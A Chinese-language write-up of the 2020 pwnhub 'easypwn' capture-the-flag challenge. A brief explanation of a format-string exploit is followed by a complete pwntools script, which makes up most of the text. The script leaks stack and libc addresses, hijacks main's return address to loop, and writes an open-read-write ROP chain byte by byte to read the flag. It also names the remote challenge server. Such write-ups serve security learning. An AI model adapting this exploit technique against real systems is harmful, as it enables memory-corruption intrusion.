2020 pwnhub 公开赛 -- easypwn

蛮有意思的一题，格式化字符串，0x18个字节，2次机会，数据写在栈上；

很显然需要构造循环多次利用格式化字符串漏洞，第一次用来泄漏地址，第二次修改返回地址为main,回到printf处继续利用

但是题目禁用了execv，也就意味着需要通过orw去读取flag，只能构造rop了;用printf去写rop链，这也是比较有意思的地方；每一次回到printf处都有两次任意地址写的机会，一次需要用来修改返回地址，第二次就可以用来写rop了，这个rop写到main的返回地址处即可

#coding:utf-8
from pwn import *
import sys

local = 1
context.terminal=['tmux','splitw','-h']
if len(sys.argv) == 2 and (sys.argv[1] == 'DEBUG' or sys.argv[1] == 'debug'):
    context.log_level = 'debug'

if local:
    p = process('./easypwn')
    elf = ELF('./easypwn',checksec = False)
    libc = elf.libc
else:
	p = remote("139.217.102.146","33865")
    elf = ELF('./easypwn',checksec = False)
    libc = elf.libc

#内存地址随机化
def debug(addr=0,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
        print "breakpoint_addr --> " + hex(text_base + 0x202040)
        gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
    else:
        gdb.attach(p,"b *{}".format(hex(addr))) 

sd = lambda s:p.send(s)
rc = lambda s:p.recv(s)
sl = lambda s:p.sendline(s)
ru = lambda s:p.recvuntil(s)
sda = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)

def show(name,addr):
	log.info(name + " --> %s",hex(addr))


# stack ,libc ,text
pay = "%14$p-%19$p-%15$p"
sla("name?\n",pay)
stack = int(ru('-')[:-1],16)
buf_stack = stack - 0x68
times_stack = stack - 8
main_ret_stack = stack + 8
libc_start_main = int(ru('-')[:-1],16)
libc_base = libc_start_main - 240 - libc.symbols['__libc_start_main']
text_base = int(ru('\n')[:-1],16) - 0xd4d

pop_rdi = text_base + 0xdd3
pop_rsi = 0x00000000000202f8 + libc_base
pop_rdx = 0x0000000000001b92 + libc_base
pop_rax = 0x000000000003a738 + libc_base
syscall_ret = 0x00000000000bc3f5 + libc_base
flag_addr = text_base + 0x202084

show("stack",stack)
show("buf_stack",buf_stack)
show("main_ret_stack",main_ret_stack)
# show("times_stack",times_stack)
# show("libc_base",libc_base)
show("text_base",text_base)
# show("libc_start_main",libc_start_main)
show("pop_rdi",pop_rdi)

sla("you??\n",str(0x67616c66))
# pause()
# 回到main
main = text_base + 0xd10
ret_stack = stack - 0x18

pay = "%58c%10$hhnAAAAA"
pay += p64(ret_stack)
# debug(0xc6e)
sla("name?\n",pay)
sla("you??\n",str(0x67616c66))

def change(addr,vaule):
    if vaule == 0:
        vaule = 0x100
    pay = "%" + str(vaule) + "c%10$hhn"
    pay = pay.ljust(0x10,"A")
    pay += p64(addr)
    sla("name?\n",pay)
    sla("you??\n",str(0x67616c66))

    pay = "%58c%10$hhnAAAAA"
    pay += p64(ret_stack)
    sla("name?\n",pay)
    sla("you??\n",str(0x67616c66))

def write(target,vaule):
    for i in range(8):
        change(target + i,(vaule >> 8*i) & 0xff)

# execv 被禁用了
# orw

write(main_ret_stack,pop_rdi)
write(main_ret_stack + 8*1,flag_addr)
write(main_ret_stack + 8*2,pop_rsi)
write(main_ret_stack + 8*3,0)
write(main_ret_stack + 8*4,pop_rax)
write(main_ret_stack + 8*5,2)
write(main_ret_stack + 8*6,syscall_ret) # open("flag")
write(main_ret_stack + 8*7,pop_rdi)
write(main_ret_stack + 8*8,3)
write(main_ret_stack + 8*9,pop_rsi)
write(main_ret_stack + 8*10,flag_addr)
write(main_ret_stack + 8*11,pop_rdx)
write(main_ret_stack + 8*12,0x30)
write(main_ret_stack + 8*13,pop_rax)
write(main_ret_stack + 8*14,0)
write(main_ret_stack + 8*15,syscall_ret)
write(main_ret_stack + 8*16,pop_rdi)
write(main_ret_stack + 8*17,1)
write(main_ret_stack + 8*18,pop_rsi)
write(main_ret_stack + 8*19,flag_addr)
write(main_ret_stack + 8*20,pop_rdx)
write(main_ret_stack + 8*21,0x30)
write(main_ret_stack + 8*22,pop_rax)
write(main_ret_stack + 8*23,1)
write(main_ret_stack + 8*24,syscall_ret)

sla("name?\n","flag\x00"*4 + 'aaa')
sla("you??\n",str(0x67616c66))
# debug(0xc6e)
sla("name?\n","flag\x00"*4 + 'aaa')
sla("you??\n",str(0x67616c66))

# debug()

p.interactive()